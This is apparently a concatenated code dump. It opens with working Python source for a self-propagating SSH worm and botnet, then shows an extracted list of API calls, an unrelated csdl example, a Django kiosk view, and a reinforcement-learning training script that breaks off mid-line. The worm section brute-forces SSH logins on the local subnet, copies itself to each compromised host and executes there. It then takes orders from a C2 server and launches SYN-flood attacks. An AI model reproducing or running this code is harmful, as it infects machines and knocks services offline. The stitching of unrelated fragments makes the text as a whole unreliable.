# 1. Uses nmap to scan the local subnet for IP systems which have
# ssh open on the default port, 22.
# 2. Attempts to gain access by bruteforce with a pre-set list
# of credentials
# 3. If connected, copy self to the victim and begin execution
# on the victim
##################################################################
def access_system(host):
""" Perform a brute force attack against a host system
@param host: hostname/ip of target system
@return: tuple of instance of paramiko SSH class, successful username,
succesful password; None otherwise
"""
global credentials
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logger.info('Accessing {}'.format(host))
for (username, password) in credentials:
result = try_credentials(host, username, password, ssh)
if result == 0:
return (ssh, username, password)
logger.info('Could not access {}'.format(host))
return None
def get_targets(subnet):
""" Get list of target systems
@param subnet: the target subnet; example '192.168.1.1/24'
@return: list of potential target hosts with default ssh port open, 22
"""
nm = nmap.PortScanner()
hosts = []
nm.scan(subnet, arguments='-p 22 --open')
hosts = nm.all_hosts()
targets = []
for host in hosts:
if nm[host].state() == 'up' and host != MASTER and \
host != ID and not host.startswith('127.'):
targets.append(host)
return targets
def spread(sshclient):
""" Spread to target victim system and start the bot
@param sshclient: instance of paramiko SSH class connected to a system
"""
sftp = sshclient.open_sftp()
sftp.put(os.path.abspath(sys.argv[0]), BOT_FILE_PATH)
sftp.chmod(BOT_FILE_PATH, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)
sftp.close()
sshclient.exec_command('python ' + BOT_FILE_PATH)
#sshclient.exec_command('python3 ' + BOT_FILE_PATH)
def try_credentials(host, username, password, sshclient):
""" Try connecting to a host with a set of credentials
@param host: hostname/ip of target system
@param username: username to try
@param password: password to try
@param sshclient: instance of paramiko SSH class
@return: 0 for success; -1 for socket error;
1 for wrong credentials, maybe
"""
try:
sshclient.connect(host, username=username, password=password)
except paramiko.AuthenticationException:
return 1
except paramiko.SSHException:
return 1
except socket.error:
return -1
return 0
def worm_driver(target):
""" Driver for the worm
@param target: ipv4 address of beginning target
@side-effect: when done, sets bot state to ready
"""
logger.info('LOADING WORM')
global state
state = 1
targets = get_targets(target + '/24')
logger.info('worm targets: {}'.format(targets))
for target in targets:
sshInfo = access_system(target)
if sshInfo:
sftp = sshInfo[0].open_sftp()
try:
sftp.get(BOT_FILE_PATH, '/tmp/' + target + '.txt')
logger.info('{} is a friend'.format(target))
except IOError:
logger.info('Infecting {}'.format(target))
spread(sshInfo[0])
finally:
os.remove('/tmp/' + target + '.txt')
sftp.close()
sshInfo[0].close()
state = 0
logger.info('TERMINATING WORM')
##################################################################
# BOT
# Communication is transmitted via UDP
# Messages accepted from C2 server:
# 'ROLL': roll call to check for bot's state
# 'ATCK': launch an attack; see atck_command for more details
# 'STOP': terminate active attacks
# Messages sent to C2 server:
# 'HELO': tells the C2 server that bot is up
# 'REDY': response to 'ROLL' for bot in ready state
# 'BUSY': response to 'ROLL' for bot not in ready state
# NOTE: raw sockets & scapy module require root privileges
##################################################################
def atck_command(tokens):
""" Processes an attack message from the C2 server
Attack 0: spread bot
Attack 1: syn flood
NOTE: remember to check for stopping state in the attacks and
to reset to ready state when attack ends
@param tokens: tokenized attack command in the following format:
['ATCK', <int for attack type>, <target IPv4 address>]
@side-effect: sets bot state to attacking
"""
global state
if state != 2: # check for enrolled state
return
try:
atck_type = int(tokens[1])
target = tokens[2]
state = 1
logger.info('Starting attack {} on {}'.format(atck_type, target))
if target == MASTER or target.startswith('127.'):
state = 0
return
if atck_type == 0: # spread the bot, ignores stop command
worm_driver(target)
elif atck_type == 1: # syn flood
syn_flood(target)
except (ValueError, IndexError):
return
def hello():
""" Sends a 'HELO' message to the C2 server every minute
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
sock.sendto('HELO', (MASTER, PORT))
#sock.sendto(bytes('HELO', 'utf-8'), (MASTER, PORT))
time.sleep(60)
sock.close()
def process_commands(message):
""" Processes commands received from the C2 server
@param message: message from the C2 server
"""
tokens = message.split(DELIMITER)
command = tokens[0]
if command == 'ROLL':
roll_command()
elif command == 'ATCK':
atck_command(tokens)
elif command == 'STOP':
stop_command()
else:
return
def roll_command():
""" Sends a 'REDY' message if bot is in ready state, 'BUSY' otherwise
"""
global state
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if state == 0:
state = 2
sock.sendto('REDY', (MASTER, PORT))
#sock.sendto(bytes('REDY', 'utf-8'), (MASTER, PORT))
else:
sock.sendto('BUSY', (MASTER, PORT))
#sock.sendto(bytes('BUSY', 'utf-8'), (MASTER, PORT))
sock.close()
def stop_command():
""" Terminate any active attacks
@side- effect: sets bot state to ready
"""
global state
state = 3
time.sleep(5) # should be long enough for attack threads to see stop state
state = 0
def syn_flood(target):
""" Perform a syn flood on target system
@param target: IPv4 of system to attack
"""
count = 0
while state == 1 and count < MAX_THREAD:
count = count + 1
threading.Thread(target=tcp_syn, args=(target,)).start()
def bot_driver():
""" Driver for the bot
"""
logger.info('LOADING BOT')
global state
threading.Thread(target=hello).start()
master_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
master_sock.bind(('', PORT))
#state = 0 # don't set bot to ready yet. potential race condition with worm driver
while True:
message = master_sock.recv(1024)
logger.info('Received: {}'.format(message))
threading.Thread(target=process_commands, args=(message,)).start()
master_sock.close()
##################################################################
# SYN FLOOD
##################################################################
def calculate_tcp_checksum(message):
""" Calculate the TCP checksum
@param message: payload + TCP headers + pseudoheader
@return: 16-bit TCP checksum value
"""
cs = 0
for i in range(0, len(message), 2):
w = (ord(message[i])<<8 + ord(message[i+1]))
cs = cs + w
cs = (cs>>16) + (cs & 0xffff)
cs = ~cs & 0xffff
return cs
def create_ip_header(src, dst):
""" Create the IP header
@param src: source IPv4 address in binary format
@param dst: destination IPv4 address in binary format
@return: IPv4 header
"""
# IPv4 header fields
v_ihl = 69 # 0x45; version 4, internet header length 5
dscp_ecn = 0 # type of service
total_len = 20 + 20 # length of packet; ip header + tcp header
ident = random.randint(0, 65535) # identification
flag_frag = 0 # flag and fragment offset
ttl = 255 # time to live
protocol = socket.IPPROTO_TCP # protocol; TCP
checksum = 0 # checksum value; python fills this out??
return struct.pack('!BBHHHBBH4s4s', v_ihl, dscp_ecn, total_len,
ident, flag_frag, ttl, protocol, checksum, src, dst)
def create_tcp_header(src, dst):
""" Create the TCP header
@param src: source IPv4 address in binary format
@param dst: destination IPv4 address in binary format
@return: TCP header
"""
# TCP header fields
src_port = 8008 #random.randint(1024, 65535) # source port, non-privileged
dest_port = 80 # destination port; http
seq = 0 # sequence number
ack = 0 # acknowledgement number
offset_reserved = 0x50 # data offset and reserved
flags = 2 # TCP flags; SYN flag = 1
window = socket.htons(5840) # window size
checksum = 0 # checksum value
urg = 0 # urgent pointer
temp = struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack,
offset_reserved, flags, window, checksum, urg)
# Psuedo header fields
protocol = socket.IPPROTO_TCP # protocol; TCP
tcp_len = len(temp) # length of tcp header + payload
psh = struct.pack('!4s4sHH', src, dst, protocol, tcp_len)
checksum = calculate_tcp_checksum(psh + temp)
return struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack,
offset_reserved, flags, window, checksum, urg)
def create_tcp_syn_packet(target):
""" Create the TCP SYN packet
@param target: IPv4 address
@return: TCP SYN packet
"""
'''
a = random.randint(1,255)
b = random.randint(1,255)
c = random.randint(1,255)
d = random.randint(1,255)
src_ip = '{}.{}.{}.{}'.format(a, b, c, d) # spoofed ip
'''
src_ip = ID
src = socket.inet_aton(src_ip) # source IP address
dst = socket.inet_aton(target) # destination IP address
packet = create_ip_header(src, dst) + create_tcp_header(src, dst)
return packet
def tcp_syn(target):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
while state == 1:
packet = create_tcp_syn_packet(target)
for _ in xrange(100):
if state != 1:
break
sock.sendto(packet, (target , 0))
sock.close()
except: # no root privilege
while state == 1:
os.system('nc ' + target + ' 80')
##################################################################
# MAIN DRIVER
# Starts the worm driver and the bot driver
##################################################################
def main():
""" Main driver for the bot
"""
global ID
if ID.startswith('127.'): # maybe in a VM environment
try:
import netinfo
ID = netinfo.get_ip('enp0s3')
except:
pass
threading.Thread(target=bot_driver).start()
threading.Thread(target=worm_driver, args=(ID,)).start()
if __name__ == '__main__':
main()
| [
"logging.basicConfig",
"logging.getLogger",
"netinfo.get_ip",
"paramiko.SSHClient",
"socket.socket",
"nmap.PortScanner",
"paramiko.AutoAddPolicy",
"os.system",
"socket.htons",
"time.sleep",
"struct.pack",
"socket.inet_aton",
"os.path.abspath",
"threading.Thread",
"socket.gethostname",
"random.randint",
"os.remove"
] | [((737, 896), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': '"""%(asctime)s PID:%(process)d %(threadName)s %(message)s"""', 'datefmt': '"""%H:%M:%S"""', 'filename': '"""/tmp/bot.log"""'}), "(level=logging.INFO, format=\n '%(asctime)s PID:%(process)d %(threadName)s %(message)s', datefmt=\n '%H:%M:%S', filename='/tmp/bot.log')\n", (756, 896), False, 'import logging\n'), ((956, 977), 'logging.getLogger', 'logging.getLogger', (['""""""'], {}), "('')\n", (973, 977), False, 'import logging\n'), ((411, 431), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (429, 431), False, 'import socket\n'), ((1722, 1742), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (1740, 1742), False, 'import paramiko\n'), ((2318, 2336), 'nmap.PortScanner', 'nmap.PortScanner', ([], {}), '()\n', (2334, 2336), False, 'import nmap\n'), ((6357, 6405), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (6370, 6405), False, 'import socket\n'), ((7087, 7135), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (7100, 7135), False, 'import socket\n'), ((7556, 7569), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (7566, 7569), False, 'import time\n'), ((8085, 8133), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (8098, 8133), False, 'import socket\n'), ((9388, 9412), 'random.randint', 'random.randint', (['(0)', '(65535)'], {}), '(0, 65535)\n', (9402, 9412), False, 'import random\n'), ((9625, 9738), 'struct.pack', 'struct.pack', (['"""!BBHHHBBH4s4s"""', 'v_ihl', 'dscp_ecn', 'total_len', 'ident', 'flag_frag', 'ttl', 'protocol', 'checksum', 'src', 'dst'], {}), "('!BBHHHBBH4s4s', v_ihl, dscp_ecn, total_len, ident, flag_frag,\n ttl, protocol, checksum, src, dst)\n", (9636, 9738), False, 'import struct\n'), ((10267, 10285), 'socket.htons', 'socket.htons', (['(5840)'], {}), '(5840)\n', (10279, 10285), False, 'import socket\n'), ((10374, 10481), 'struct.pack', 'struct.pack', (['"""!HHLLBBHHH"""', 'src_port', 'dest_port', 'seq', 'ack', 'offset_reserved', 'flags', 'window', 'checksum', 'urg'], {}), "('!HHLLBBHHH', src_port, dest_port, seq, ack, offset_reserved,\n flags, window, checksum, urg)\n", (10385, 10481), False, 'import struct\n'), ((10628, 10679), 'struct.pack', 'struct.pack', (['"""!4s4sHH"""', 'src', 'dst', 'protocol', 'tcp_len'], {}), "('!4s4sHH', src, dst, protocol, tcp_len)\n", (10639, 10679), False, 'import struct\n'), ((10743, 10850), 'struct.pack', 'struct.pack', (['"""!HHLLBBHHH"""', 'src_port', 'dest_port', 'seq', 'ack', 'offset_reserved', 'flags', 'window', 'checksum', 'urg'], {}), "('!HHLLBBHHH', src_port, dest_port, seq, ack, offset_reserved,\n flags, window, checksum, urg)\n", (10754, 10850), False, 'import struct\n'), ((11211, 11235), 'socket.inet_aton', 'socket.inet_aton', (['src_ip'], {}), '(src_ip)\n', (11227, 11235), False, 'import socket\n'), ((11266, 11290), 'socket.inet_aton', 'socket.inet_aton', (['target'], {}), '(target)\n', (11282, 11290), False, 'import socket\n'), ((1779, 1803), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (1801, 1803), False, 'import paramiko\n'), ((2844, 2872), 'os.path.abspath', 'os.path.abspath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (2859, 2872), False, 'import os\n'), ((6536, 6550), 'time.sleep', 'time.sleep', (['(60)'], {}), '(60)\n', (6546, 6550), False, 'import 
time\n'), ((11453, 11519), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_RAW', 'socket.IPPROTO_RAW'], {}), '(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)\n', (11466, 11519), False, 'import socket\n'), ((8027, 8057), 'threading.Thread', 'threading.Thread', ([], {'target': 'hello'}), '(target=hello)\n', (8043, 8057), False, 'import threading\n'), ((12319, 12343), 'netinfo.get_ip', 'netinfo.get_ip', (['"""enp0s3"""'], {}), "('enp0s3')\n", (12333, 12343), False, 'import netinfo\n'), ((12382, 12417), 'threading.Thread', 'threading.Thread', ([], {'target': 'bot_driver'}), '(target=bot_driver)\n', (12398, 12417), False, 'import threading\n'), ((12430, 12478), 'threading.Thread', 'threading.Thread', ([], {'target': 'worm_driver', 'args': '(ID,)'}), '(target=worm_driver, args=(ID,))\n', (12446, 12478), False, 'import threading\n'), ((4497, 4533), 'os.remove', 'os.remove', (["('/tmp/' + target + '.txt')"], {}), "('/tmp/' + target + '.txt')\n", (4506, 4533), False, 'import os\n'), ((7859, 7907), 'threading.Thread', 'threading.Thread', ([], {'target': 'tcp_syn', 'args': '(target,)'}), '(target=tcp_syn, args=(target,))\n', (7875, 7907), False, 'import threading\n'), ((8372, 8430), 'threading.Thread', 'threading.Thread', ([], {'target': 'process_commands', 'args': '(message,)'}), '(target=process_commands, args=(message,))\n', (8388, 8430), False, 'import threading\n'), ((11896, 11929), 'os.system', 'os.system', (["('nc ' + target + ' 80')"], {}), "('nc ' + target + ' 80')\n", (11905, 11929), False, 'import os\n')] |
def example(Simulator):
from csdl import Model
import csdl
import numpy as np
class ExampleElementwise(Model):
def define(self):
m = 2
n = 3
# Shape of the three tensors is (2,3)
shape = (m, n)
# Creating the values for two tensors
val1 = np.array([[1, 5, -8], [10, -3, -5]])
val2 = np.array([[2, 6, 9], [-1, 2, 4]])
# Declaring the two input tensors
tensor1 = self.declare_variable('tensor1', val=val1)
tensor2 = self.declare_variable('tensor2', val=val2)
            # Creating the output of the elementwise maximum
ma = self.register_output('ElementwiseMax',
csdl.max(tensor1, tensor2))
assert ma.shape == (2, 3)
sim = Simulator(ExampleElementwise())
sim.run()
print('tensor1', sim['tensor1'].shape)
print(sim['tensor1'])
print('tensor2', sim['tensor2'].shape)
print(sim['tensor2'])
print('ElementwiseMax', sim['ElementwiseMax'].shape)
print(sim['ElementwiseMax'])
return sim | [
"numpy.array",
"csdl.max"
] | [((360, 396), 'numpy.array', 'np.array', (['[[1, 5, -8], [10, -3, -5]]'], {}), '([[1, 5, -8], [10, -3, -5]])\n', (368, 396), True, 'import numpy as np\n'), ((416, 449), 'numpy.array', 'np.array', (['[[2, 6, 9], [-1, 2, 4]]'], {}), '([[2, 6, 9], [-1, 2, 4]])\n', (424, 449), True, 'import numpy as np\n'), ((790, 816), 'csdl.max', 'csdl.max', (['tensor1', 'tensor2'], {}), '(tensor1, tensor2)\n', (798, 816), False, 'import csdl\n')] |
from django.views.generic.base import TemplateView
from django.shortcuts import get_object_or_404, render
from .models import Kiosk
from event_kiosk.presentations.models import Slide
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
import django.utils.timezone as timezone
import os
import datetime
class KioskView(TemplateView):
template_name = "kiosk.html"
def get_context_data(self, **kwargs):
slug = kwargs['name']
kiosk = get_object_or_404(Kiosk, name=slug)
context = super(KioskView, self).get_context_data(**kwargs)
context['kiosk'] = kiosk.name
return context
@csrf_exempt
def kiosk_data(request, **kwargs):
slug = kwargs['name']
kiosk = get_object_or_404(Kiosk, name=slug)
currentPresentation = kiosk.presentation
# construct the JSON representation of the kiosk
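    # A calendar entry that is active right now overrides the default presentation;
    # entries whose end time has already passed are deleted.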
for scheduledPresentation in kiosk.kioskpresentationcalendar_set.all():
if scheduledPresentation.endTime > timezone.now() >= scheduledPresentation.startTime:
currentPresentation = scheduledPresentation.scheduledPresentation
# Clean up past KioskPresentationCalendar (the presentation itself is not deleted)
elif timezone.now() > scheduledPresentation.endTime:
scheduledPresentation.delete()
sections = []
for section in kiosk.sections.all():
sections.append(section.to_json())
slides = []
for slide in currentPresentation.slides.all():
if (slide.type == Slide.EVENT and
(timezone.now().date() > slide.event.date or
(
timezone.now().date() == slide.event.date and
timezone.now().time() > slide.event.endTime
)
)):
# Clean up past event slides (the event itself is not deleted)
slide.delete()
else:
slides.append(slide.to_json())
# Get header image if exists
presentation = {
'headerImage': currentPresentation.headerImage.url if currentPresentation.headerImage else None,
'transitionTime': currentPresentation.transitionTime * 1000,
'pauseTimeOnTouch': currentPresentation.pauseTimeOnTouch * 1000,
'slides': slides,
'displayMenu': currentPresentation.displayMenu,
'displayIndicators': currentPresentation.displayIndicators
}
kiosk = {
'appVersion': os.environ.get('APP_VERSION'),
'presentation': presentation,
'sections': sections
}
return JsonResponse(kiosk)
def appcache_manifest(request, **kwargs):
return render(request, 'appcache.html', content_type="text/cache-manifest; charset=utf-8")
| [
"django.shortcuts.render",
"django.http.JsonResponse",
"django.shortcuts.get_object_or_404",
"os.environ.get",
"django.utils.timezone.now"
] | [((749, 784), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Kiosk'], {'name': 'slug'}), '(Kiosk, name=slug)\n', (766, 784), False, 'from django.shortcuts import get_object_or_404, render\n'), ((2549, 2568), 'django.http.JsonResponse', 'JsonResponse', (['kiosk'], {}), '(kiosk)\n', (2561, 2568), False, 'from django.http import JsonResponse\n'), ((2623, 2711), 'django.shortcuts.render', 'render', (['request', '"""appcache.html"""'], {'content_type': '"""text/cache-manifest; charset=utf-8"""'}), "(request, 'appcache.html', content_type=\n 'text/cache-manifest; charset=utf-8')\n", (2629, 2711), False, 'from django.shortcuts import get_object_or_404, render\n'), ((496, 531), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Kiosk'], {'name': 'slug'}), '(Kiosk, name=slug)\n', (513, 531), False, 'from django.shortcuts import get_object_or_404, render\n'), ((2433, 2462), 'os.environ.get', 'os.environ.get', (['"""APP_VERSION"""'], {}), "('APP_VERSION')\n", (2447, 2462), False, 'import os\n'), ((1003, 1017), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1015, 1017), True, 'import django.utils.timezone as timezone\n'), ((1236, 1250), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1248, 1250), True, 'import django.utils.timezone as timezone\n'), ((1553, 1567), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1565, 1567), True, 'import django.utils.timezone as timezone\n'), ((1635, 1649), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1647, 1649), True, 'import django.utils.timezone as timezone\n'), ((1701, 1715), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1713, 1715), True, 'import django.utils.timezone as timezone\n')] |
# <NAME> 2022
# Task 2B
#
from floodsystem.flood import stations_level_over_threshold
from floodsystem.stationdata import build_station_list, update_water_levels
def run():
stations = build_station_list()
update_water_levels(stations)
    stations_over = stations_level_over_threshold(stations, 0.8)  # stations (with valid data) whose latest relative water level is over 0.8
print("The stations currently above the tolerance are:")
for i in range(len(stations_over)):
print((stations_over[i][0]).name, (stations_over[i][0].relative_water_level()))#prints the station name and relative water level
if __name__ == "__main__":
print("*** Task 2B: CUED Part IA Flood Warning System ***")
run() | [
"floodsystem.stationdata.build_station_list",
"floodsystem.flood.stations_level_over_threshold",
"floodsystem.stationdata.update_water_levels"
] | [((190, 210), 'floodsystem.stationdata.build_station_list', 'build_station_list', ([], {}), '()\n', (208, 210), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((215, 244), 'floodsystem.stationdata.update_water_levels', 'update_water_levels', (['stations'], {}), '(stations)\n', (234, 244), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((266, 310), 'floodsystem.flood.stations_level_over_threshold', 'stations_level_over_threshold', (['stations', '(0.8)'], {}), '(stations, 0.8)\n', (295, 310), False, 'from floodsystem.flood import stations_level_over_threshold\n')] |
""" Test case for the HierarchyWidget """
from tempfile import mkdtemp
from pySUMOQt import MainWindow
import pysumo
import shutil
"""
Steps:
1. Open pySUMO
2. Open HierarchyWidget
3. Open Merge.kif
4. Type instance into the Relation field
4a. Press Enter
5. Type unitofcurrency into the Node field
5a. Press Enter
6. Type subrelation into the Relation field
6a. Press Enter
7. Collapse all
8. Expand all
"""
if __name__ == "__main__":
tmpdir = mkdtemp()
pysumo.CONFIG_PATH = tmpdir
MainWindow.main()
shutil.rmtree(tmpdir, ignore_errors=True)
| [
"pySUMOQt.MainWindow.main",
"tempfile.mkdtemp",
"shutil.rmtree"
] | [((450, 459), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (457, 459), False, 'from tempfile import mkdtemp\n'), ((496, 513), 'pySUMOQt.MainWindow.main', 'MainWindow.main', ([], {}), '()\n', (511, 513), False, 'from pySUMOQt import MainWindow\n'), ((518, 559), 'shutil.rmtree', 'shutil.rmtree', (['tmpdir'], {'ignore_errors': '(True)'}), '(tmpdir, ignore_errors=True)\n', (531, 559), False, 'import shutil\n')] |
import torch
import config as c
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
IN_WEIGHTS_FILE = c.BASE_DIRECTORY + "/" + c.FILENAME # Name of the file having weights to be transferred.
class Init_weights:
"""Transfer weights based on specific method."""
def __init__(self):
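        # Load the source network's weights once; weight_transfer() reshapes them for the chosen method.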
self.weights = torch.load(IN_WEIGHTS_FILE, map_location=torch.device('cpu'))
def weight_transfer(self, transfer_method, fc1_shape):
"""
Parameters:
transfer_method (int): Value 0 to 6 for different methods.
        fc1_shape (int): Shape of the first hidden layer.
"""
# Architecture changes
w = self.weights
if transfer_method == 1:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc2_.weight'].T
ind = int(w.shape[0] / fc1_shape)
x = torch.mean(w[:ind], dim=0).unsqueeze(1)
for i in range(2, fc1_shape + 1):
x = torch.cat((x, torch.mean(w[:ind], dim=0).unsqueeze(1)), dim=1)
w = x
elif transfer_method == 2:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc2.weight']
w = torch.cat((w, torch.zeros(144, 120).to(device)), dim=1)
w = torch.cat((w, torch.zeros(48, 192).to(device)), dim=0)
elif transfer_method == 3:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc2.weight']
w = torch.cat((w, torch.zeros(144, 120).to(device)), dim=1)
ind = int(w.shape[0] / fc1_shape)
x = torch.mean(w[:ind], dim=0).unsqueeze(1)
for i in range(2, fc1_shape + 1):
x = torch.cat((x, torch.mean(w[:ind], dim=0).unsqueeze(1)), dim=1)
w = x
# Information extraction
elif transfer_method == 4:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc3.weight'].T
w = torch.cat((w, torch.zeros(w.shape).to(device)), dim=1)
elif transfer_method == 5:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc3.weight'].T
w = torch.cat((w, w), dim=1)
elif transfer_method == 6:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc3.weight']
w = repeat(w, [2, 1]).T
return w
def repeat(t, dims):
"""
    Parameters:
        t (tensor): Original tensor
        dims (list): Repeat count for each dimension of t
"""
if len(dims) != len(t.shape):
raise ValueError("Number of dimensions of tensor should be equal to length of dims")
for index, dim in enumerate(dims):
repeat_vector = [1] * (len(dims) + 1)
repeat_vector[index + 1] = dim
new_shape = list(t.shape)
new_shape[index] *= dim
t = t.unsqueeze(index + 1).repeat(repeat_vector).reshape(new_shape)
return t
| [
"torch.mean",
"torch.cuda.is_available",
"torch.zeros",
"torch.cat",
"torch.device"
] | [((68, 93), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (91, 93), False, 'import torch\n'), ((378, 397), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (390, 397), False, 'import torch\n'), ((886, 912), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (896, 912), False, 'import torch\n'), ((1624, 1650), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (1634, 1650), False, 'import torch\n'), ((2210, 2234), 'torch.cat', 'torch.cat', (['(w, w)'], {'dim': '(1)'}), '((w, w), dim=1)\n', (2219, 2234), False, 'import torch\n'), ((1006, 1032), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (1016, 1032), False, 'import torch\n'), ((1240, 1261), 'torch.zeros', 'torch.zeros', (['(144)', '(120)'], {}), '(144, 120)\n', (1251, 1261), False, 'import torch\n'), ((1312, 1332), 'torch.zeros', 'torch.zeros', (['(48)', '(192)'], {}), '(48, 192)\n', (1323, 1332), False, 'import torch\n'), ((1520, 1541), 'torch.zeros', 'torch.zeros', (['(144)', '(120)'], {}), '(144, 120)\n', (1531, 1541), False, 'import torch\n'), ((1744, 1770), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (1754, 1770), False, 'import torch\n'), ((2014, 2034), 'torch.zeros', 'torch.zeros', (['w.shape'], {}), '(w.shape)\n', (2025, 2034), False, 'import torch\n')] |
import tensorflow as tf
"""tf.lbeta(x,name=None)
Purpose: computes `ln(|Beta(x)|)`, reducing along the last dimension.
For the last dimension `z = [z_0,...,z_{K-1}]`, Beta(z) = \prod_j Gamma(z_j) / Gamma(\sum_j z_j)
Input: x is a tensor of rank n+1 and may be of type 'float' or 'double'."""
x = tf.constant([[4, 3, 3], [2, 3, 2]], tf.float64)
z = tf.lbeta(x)
# ln(gamma(4)*gamma(3)*gamma(3)/gamma(4+3+3))=ln(6*2*2/362880)=-9.62377365
# ln(gamma(2)*gamma(3)*gamma(2)/gamma(2+3+2))=ln(2/720)=-5.88610403
sess = tf.Session()
print(sess.run(z))
sess.close()
# z==>[-9.62377365 -5.88610403]
# The beta function is computed from the gamma function, where gamma(n) = (n-1)!
# For example: gamma(4) = 3*2*1 = 6
| [
"tensorflow.Session",
"tensorflow.constant",
"tensorflow.lbeta"
] | [((215, 262), 'tensorflow.constant', 'tf.constant', (['[[4, 3, 3], [2, 3, 2]]', 'tf.float64'], {}), '([[4, 3, 3], [2, 3, 2]], tf.float64)\n', (226, 262), True, 'import tensorflow as tf\n'), ((267, 278), 'tensorflow.lbeta', 'tf.lbeta', (['x'], {}), '(x)\n', (275, 278), True, 'import tensorflow as tf\n'), ((430, 442), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (440, 442), True, 'import tensorflow as tf\n')] |
#!/usr/bin/env python
# coding: utf-8
"""
Implementation of Soft Actor Critic (SAC) network
using PyTorch and Stable Baselines 3.
See https://stable-baselines3.readthedocs.io/en/master/modules/sac.html for algorithm details.
@author: <NAME> 2020 (<EMAIL>)
Project for CityLearn Competition
"""
import torch
import numpy as np
import gym
from stable_baselines3.sac.policies import MlpPolicy as MlpPolicy_SAC
from stable_baselines3 import SAC
from stable_baselines3.common.callbacks import BaseCallback
from stable_baselines3.common import make_vec_env, results_plotter
from stable_baselines3.common.monitor import Monitor
from stable_baselines3.common.results_plotter import plot_results
from stable_baselines3.common.vec_env.base_vec_env import VecEnv
from citylearn import CityLearn
from pkg3_utils import available_cpu_count as cpu_cores, SaveOnBestTrainingRewardCallback, TensorboardCallback
import matplotlib.pyplot as plt
from pathlib import Path
import warnings
import time, sys, os
import pprint as pp
from torch.utils.tensorboard import writer
# Ignore the float32 bound precision warning
warnings.simplefilter("ignore", UserWarning)
# Central agent controlling the buildings using the OpenAI Stable Baselines
climate_zone = 1
data_path = Path("data/Climate_Zone_"+str(climate_zone))
building_attributes = data_path / 'building_attributes.json'
weather_file = data_path / 'weather_data.csv'
solar_profile = data_path / 'solar_generation_1kW.csv'
building_state_actions = 'buildings_state_action_space.json'
building_ids = ['Building_1',"Building_2","Building_3","Building_4","Building_5","Building_6","Building_7","Building_8","Building_9"]
# building_ids = ['Building_1', 'Building_2']
objective_function = ['ramping','1-load_factor','average_daily_peak','peak_demand','net_electricity_consumption']
env = CityLearn(data_path, building_attributes, weather_file, solar_profile, building_ids, buildings_states_actions = building_state_actions,
cost_function = objective_function, central_agent = True, verbose = 1)
# Store the weights and scores in a new directory
parent_dir = "alg/sac_{}/".format(time.strftime("%Y%m%d-%H%M%S")) # appends the time and date
os.makedirs(parent_dir, exist_ok=True)
# Create log dir
log_dir = parent_dir+"monitor"
os.makedirs(log_dir, exist_ok=True)
# Set the interval and their count
interval = 8760
icount = int(sys.argv[1]) if len(sys.argv) > 1 else 10
log_interval = 1
check_interval = 1
# Policy kwargs
policy_kwargs = dict(
net_arch=[128,128]
)
# Make VecEnv + Wrap in Monitor
env = Monitor(env, filename=log_dir)
callbackBest = SaveOnBestTrainingRewardCallback(check_freq=check_interval*interval, log_dir=log_dir)
callbackTB = TensorboardCallback()
# Add callbacks to the callback list
callbackList = []
useBestCallback = True
useTensorboardCallback = True # Not working yet
if useBestCallback:
callbackList.append(callbackBest)
if useTensorboardCallback:
callbackList.append(callbackTB)
model = SAC(MlpPolicy_SAC, env, verbose=1, learning_rate=0.005, gamma=0.99, tau=3e-4, batch_size=2048, train_freq=25,
